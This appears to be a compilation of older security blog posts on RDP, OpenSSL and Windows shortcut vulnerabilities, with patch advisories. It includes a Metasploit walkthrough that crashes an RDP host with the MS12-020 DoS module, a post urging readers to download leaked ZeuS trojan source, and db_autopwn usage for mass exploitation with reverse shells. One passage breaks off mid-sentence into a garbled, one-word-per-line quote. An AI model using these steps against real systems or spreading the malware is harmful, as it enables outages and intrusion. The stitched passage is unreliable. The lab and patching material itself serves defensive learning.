MS12-020 RDP Vulnerability overview and testing


By now if you have been paying attention to your news readers, Google plus or twitter feed you would have noticed that Microsoft released a patch to a nasty denial of service (DOS) vulnerability. Here is a bit of information about the vulnerability; “This security update resolves two privately reported vulnerabilities in the Remote Desktop Protocol. The more severe of these vulnerabilities could allow remote code execution if an attacker sends a sequence of specially crafted RDP packets to an affected system.”

In short the system would crash and have a “blue screen of death” thus causing the system to reboot. Now the other option would allow and attach to have remote code execution on the affected system. Even though this patch was released over two weeks ago most organizations are still vulnerable and that’s not because the choose to be however most places have a  “patch cycle” which require extensive testing prior to deployment.

As explained by the fine people over at ISC Diary The Microsoft released patch has several reference KB’s which includes ” KB2671387 (Remote Code Execution – CVE-2012-0002) and KB2667402 (Denial of Service – CVE-2012-0152) or KB2621440. The reference for the update you’ll see on a Windows system, when installed, depends on the version of the OS you’re running. For Windows 7 you’ll likely note KB2667402, whereas you should only expect KB2621440 on a Windows XP host. As always before applying any patch ensure that you read the release notes.
We recently patched our internet facing servers that had RDP enabled and everything went well with the exception of one server that we were unable to log back into via RDP, we had to gain access to the server via the ILO port then applied a few additional patches then rebooted and that seen to solve the issue.Now for the fun part if you would like to test the proof of concept exploit for this vulnerability grab a copy of Metasploit follow the steps below.
 My Test setup:
  • Linux (SolusOS)
  • VirtualBox VM running Windows Server 2008 (with RDP enabled)

Launch msfconsole and follow the steps outlined here:

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf  auxiliary(ms12_020_maxchannelids) > show options

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

Name   Current Setting  Required  Description
—-   —————  ——–  ———–
RHOST                   yes       The target address
RPORT  3389             yes       The target port

msf  auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.2.10
RHOST => 192.168.2.10
msf  auxiliary(ms12_020_maxchannelids) > run

[*] 192.168.2.10:3389 – Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.2.10:3389 – 210 bytes sent
[*] 192.168.2.10:3389 – Checking RDP status…
[+] 192.168.2.10:3389 seems down
[*] Auxiliary module execution completed

RHOST = The vulnerable host that is running a vulnerable version of RDP

Screenshot of server 2008 reacting to the exploit
Now go on out and patch your systems and if you have some time load Metasploit on a host of your choice and do some testing.

Mitigation:

http://isc.sans.edu/diary.html?storyid=12808
http://www.metasploit.com/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids

http://technet.microsoft.com/en-us/library/cc732713.aspx

Should I Change My Password?


While sorting through my twitter feed yesterday I notice the following site and a informative article over at  SCmagazine explaining the site’s purpose.

In short “A Sydney security researcher has developed a web portal that allows administrators to check if work email accounts have been compromised.

The portal, (https://shouldichangemypassword.com) allows users to search through databases of stolen email addresses collated by researcher Daniel Grzelak.”

Read more over at SCMagazine.com.

My first response to this was hmm, this would be a perfect place to harvest new email addresses as a spammer with every new query to the database. But as the site owner stated “The email you enter will NOT be stored, transmitted, or otherwise used beyond this check.”.

In the end I think this is a great resource, someone actually decided to do something useful with all the hacked data that are being leaked every week or so. I send the researcher a tweet requesting a feature to do a blind search on a domain name instead of just an email address, this way you can easily see if anyone in your organization has been compromise.

Exploit packs overview, Zeus code leaked

I recently came across a really interesting intro writeup on browser exploit packs. The research team installed and tested over 40 different packs and provided some really nice feedback, here is the link.

For anyone that is not familiar what an exploit packs is, here is a brief definition;  “A browser exploit is a form of malicious code that takes advantage of a flaw or vulnerability in an operating system or piece of software with the intent to alter a user’s browser settings without their knowledge. Malicious code may exploit ActiveX, HTML, images, Java, JavaScript, and other Web technologies and cause the browser to run arbitrary code.”

The infamous ZeuS or zbot Trojan has made a name for itself in this arena. Even though zbot does not directly exploit any system vulnerability however it is very successful when it comes to infecting its victim. Zeus, which until recently was being sold on the underground black market for anywhere from $5,000-$10,000 or even more; because of this it was hard for the average guy to get his hands on a copy to review the source code.

Well not until a few days ago that is, now if you do a search for Download the ZeuS Source Code”, you will come across several sites that are hosting a leaked copy of “Zeus 2.0.8.9”, and from the looks of things its a fully loaded copy. With that said grab your copy, turn on your VM’s and let the learning begin.

 

Links:

https://secure.wikimedia.org/wikipedia/en/wiki/Browser_exploit

http://www.scmagazineuk.com/zeus-source-code-now-available-for-5000-as-predictions-made-that-its-cost-will-continue-to-drop/article/199995/

http://www.mdl4.com/2011/05/download-zeus-source-code/

 

 

Now while reading about exploit pack I started wondering how I can get myself a copy without having to spend

Exploit
packs
are
criminally
appealing
because
vic6m
exploita6on
is
quick
and
seamless
if
a
vulnerability
exists.
The
vic6m
may
not
no6ce
anything
different
in
their
computer’s
behavior
post
drive-­‐by.
The
majority
of
exploit
packs
we
tested
simply
required
the
client
computer
visit
the
root
index.php
page.
The
newer
families
required
a
drive-­‐by
to
a
specifically
craKed
URI
that
corresponded
to
a
specific
“user”
(renter)
of
the
managed
exploit
pack.

FreeBSD-SA-10:10.openssl “Time to patch”

I noticed an email this morning mentioned a openssl issue that affects the FreeBSD platform and I wanted to mention it again in case anyone missed it when it came out yesterday.

I just  patched my system  according to the steps in the advisory and I will report back if I experience any issues after patching.

I. Background

FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is
a collaborative effort to develop a robust, commercial-grade, full-featured
Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)
and Transport Layer Security (TLS v1) protocols as well as a full-strength
general purpose cryptography library.

II. Problem Description

A race condition exists in the OpenSSL TLS server extension code
parsing when used in a multi-threaded application, which uses
OpenSSL’s internal caching mechanism. The race condition can lead to
a buffer overflow. [CVE-2010-3864]

A double free exists in the SSL client ECDH handling code, when
processing specially crafted public keys with invalid prime
numbers. [CVE-2010-2939]

III. Impact

For affected server applications, an attacker may be able to utilize
the buffer overflow to crash the application or potentially run
arbitrary code with the privileges of the application. [CVE-2010-3864].

It may be possible to cause a DoS or potentially execute arbitrary in
the context of the user connection to a malicious SSL server.
[CVE-2010-2939]

IV. Workaround

No workaround is available, but CVE-2010-3864 only affects FreeBSD 8.0
and later.

It should also be noted that CVE-2010-3864 affects neither the Apache
HTTP server nor Stunnel.

V. Solution

Perform one of the following:

1) Upgrade your vulnerable system to 7-STABLE or 8-STABLE, or to the
RELENG_8_1, RELENG_8_0, RELENG_7_3, or RELENG_7_1 security branch
dated after the correction date.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to FreeBSD 7.1, 7.3,
8.0 and 8.1 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 7.x]
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl7.patch
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl7.patch.asc

[FreeBSD 8.x]
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl.patch
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl.patch.asc

b) Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/secure/lib/libssl
# make obj && make depend && make && make install

NOTE: On the amd64 platform, the above procedure will not update the
lib32 (i386 compatibility) libraries. On amd64 systems where the i386
compatibility libraries are used, the operating system should instead
be recompiled as described in
<URL:http://www.FreeBSD.org/handbook/makeworld.html&gt;

3) To update your vulnerable system via a binary patch:

Systems running 7.1-RELEASE, 7.3-RELEASE, 8.0-RELEASE or 8.1-RELEASE
on the i386 or amd64 platforms can be updated via the
freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

VI. Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Links:

http://www.freebsd.org/security/advisories.html

http://security.freebsd.org/advisories/FreeBSD-SA-10:10.openssl.asc

Notes for Linux Basix Eps24

Show notes for Linux Basix podcast:

Discussion Links:

News: http://www.wired.com/threatlevel/2010/09/zeus-botnet-ring/

Zeus botnet ring: Thirty-seven people are being charged in the U.S. for their alleged role in an international fraud ring based in East Europe that stole more than $3 million from bank accounts belonging primarily to small businesses and municipalities, according to indictments released Thursday.

The sophisticated ring included a multitude of East Europeans who entered the U.S. on student visas and fake passports to operate as so-called “money mules,”  laundering funds stolen from U.S. accounts and sending the money overseas.

Bye Bye Bios: New PCs could start in just seconds, thanks to an update to one of the oldest parts of desktop computers.The upgrade will spell the end for the 25-year-old PC start-up software known as Bios that initialises a machine so its operating system can get going.

The code was not intended to live nearly this long, and adapting it to modern PCs is one reason they take as long as they do to warm up. Bios’ replacement, known as UEFI, will predominate in new PCs by 2011.The acronym stands for Unified Extensible Firmware Interface and is designed to be more flexible than its venerable predecessor.

News: http://www.wired.com/gadgetlab/2010/09/data-collection-android/

Data collection Andriod:Something as simple as changing your Android phone’s wallpaper or downloading a ringtone could transmit personal data about you, including your location, without your knowledge.

Sound farfetched? It’s not: About 15 of 30 randomly selected, popular, free Android apps sent sent users’ private information to remote advertising servers and two-thirds of the apps handled data in ambiguous
ways, say researchers.

News: http://www.informationweek.com/news/government/security/showArticle.jhtml?articleID=227500797

DHS Launches Cyber Attack Exercise:For three or four days this week, the Internet will come under a virtual attack from an unknown adversary, and it will be up to the government and private sector’s coordinated efforts to root out the cause and work together to keep systems up and running — at least within the simulated confines of the Department of Homeland Security’s Cyber Storm III exercise, which begins Tuesday.

The Cyber Storm series of exercises simulates large cyber attacks on critical infrastructure and government IT assets in order to test the government’s preparedness. Specifically, this year’s exercise will be the first time DHS will test both the draft National Cyber Incident Response Plan (an effort to provide a coordinated response to major cybersecurity incidents) that will be publicly released later this year and the new National Cybersecurity and Communications Integration Center (the hub of DHS’ cybersecurity coordination efforts).

Tech segment: “Nessus Bridge for Metasploit

The idea for this segment and a future blog post that I will be releasing tomorrow with an interview from the author,came about from a posting I saw on twitter this week. After reading the author’s site I said to myself this is some “prety cool stuff”

Basic Idea:

The general concept is to allow you to do various tasks with your Nessus server, from within the msf command line.  By that I mean scan with Nessus, review the results, import the results and then exploit the results.

Below is the current and future list of feature that the author is currently developing:

  • Generic Commands
  • Reports Commands
  • Scan Commands
  • Plugin Commands
  • User Commands
  • Policy Commands
  • Checkout his blog and keep an eye on this project –> http://blog.zate.org

    What do you need to start testing:

    • A host with Metasploit installed and configured (I recommend BackTrack 4)
    • A host with a Nessus server installed and updated (I recommend you install on your BT4 host)
    • A vulnerable host to test with (I recommend you download metasploitable)

    Once you have the above criteria met, log into your Nessus server via the web interface and create your test policy. From this point onwards you can log-out of your server and close your web browser.

    Next do the following:

    1-  Load up your Metasploit console via /pentest/exploit/framework3/msfconsole
    2-  Ensure you have the most updated version “svn up”
    3-  Load the nessus module  “load nessus”
    4- Connect to your nessus server with “nessus_connect user@myhost:8834 ok”
    5-  Next start your first scan with “nessus_scan_new <policy id> <scan name> <targets>”
    6-  While running you can issues “nessus_scan_status” to view when its completed
    7-  Next you can need to get your report ID with the following command “nessus_report_list”
    8-  Create db workspace and import scanned results “db_connect” then “nessus_report_get <report id>”
    9- Choose a report ID number and use the following to view the details so you can see if your host has any high risk vulnerability to exploit with MSF “nessus_report_hosts <report id>” .

    From here on you can issue the db_autopwn commands and have fun:

    Usage: db_autopwn [options]
    -h          Display this help text
    -t          Show all matching exploit modules
    -x          Select modules based on vulnerability references
    -p          Select modules based on open ports
    -e          Launch exploits against all matched targets
    -r          Use a reverse connect shell
    -b          Use a bind shell on a random port (default)
    -q          Disable exploit module output
    -R  [rank]  Only run modules with a minimal rank
    -I  [range] Only exploit hosts inside this range
    -X  [range] Always exclude hosts inside this range
    -PI [range] Only exploit hosts with these ports open
    -PX [range] Always exclude hosts with these ports open
    -m  [regex] Only run modules whose name matches the regex
    -T  [secs]  Maximum runtime for any exploit in seconds

    Go out and have some fun,and look for my follow-up post tomorrow.

    Microsoft Validates Shortcut Vulnerability

    Last Thursday I read a posting over at   http://krebsonsecurity.com referencing  a potential vulnerability that relates to the way how Windows parses shortcuts. Since Microsoft didn’t confirm this at the time it was just another  interesting read. Now one day later Microsoft did validate this claim and now its yet another Windows zero-day without a proper workaround.

    Issue:

    The vulnerability exists because Windows incorrectly parses shortcuts in such a way that malicious code may be executed when the user clicks the displayed icon of a specially crafted shortcut. This vulnerability is most likely to be exploited through removable drives. For systems that have AutoPlay disabled, customers would need to manually browse to the root folder of the removable disk in order for the vulnerability to be exploited.

    Workaround:

    Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:

    Disable the displaying of icons for shortcuts

    Note Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the “Changing Keys And Values” Help topic in Registry Editor (Regedit.exe) or view the “Add and Delete Information in the Registry” and “Edit Registry Data” Help topics in Regedt32.exe.

    1. Click Start, click Run, type Regedit in the Open box, and then click OK
    2. Locate and then click the following registry key:

    HKEY_CLASSES_ROOTlnkfileshellexIconHandler

    3. Click the File menu and select Export
    4. In the Export Registry File dialog box, enter LNK_Icon_Backup.reg and click Save

    Note This will create a backup of this registry key in the My Documents folder by default

    5. Select the value (Default) on the right hand window in the Registy Editor. Press Enter to edit the value of the key. Remove the value, so that the value is blank, and press Enter.
    6. Restart explorer.exe or restart the computer.

    Impact of workaround.Disabling icons from being displayed for shortcuts prevents the issue from being exploited on affected systems. When this workaround is implemented, shortcut files and Internet Explorer shortcuts will no longer have an icon displayed.

    Disable the WebClient service

    Disabling the WebClient service helps protect affected systems from attempts to exploit this vulnerability by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning (WebDAV) client service. After applying this workaround, it will still be possible for remote attackers who successfully exploited this vulnerability to cause Microsoft Office Outlook to run programs located on the targeted user’s computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet.

    To disable the WebClient Service, follow these steps:

    1. Click Start, click Run, type Services.msc and then click OK.
    2. Right-click WebClient service and select Properties.
    3. Change the Startup type to Disabled. If the service is running, click Stop.
    4. Click OK and exit the management application.

    Impact of workaround. When the WebClient service is disabled, Web Distributed Authoring and Versioning (WebDAV) requests are not transmitted. In addition, any services that explicitly depend on the Web Client service will not start, and an error message will be logged in the System log. For example, WebDAV shares will be inaccessible from the client computer.

    How to undo the workaround.

    To re-enable the WebClient Service, follow these steps:

    1. Click Start, click Run, type Services.msc and then click OK.
    2. Right-click WebClient service and select Properties.
    3. Change the Startup type to Automatic. If the service is not running, click Start.
    4. Click OK, and exit the management application.

    This brings up the same concern I spoke about in this post , now that Microsoft is no longer supporting SP2 we can add this to the list of exploits that we can always be certain will work on the SP2 platform. In the end, if the workaround is not hindering any mission critical application  I think everyone should apply it.

    References:

    http://krebsonsecurity.com/2010/07/experts-warn-of-new-windows-shortcut-flaw/

    http://www.computerworld.com/s/article/9179299/Microsoft_confirms_nasty_Windows_zero_day_bug?taxonomyId=17

    http://www.microsoft.com/technet/security/advisory/2286198.mspx

    http://clubhouse.microsoft.com/Public/Post/48631f1c-c884-4d3e-a19b-c9994bcd4637

    Click OK and exit the management application.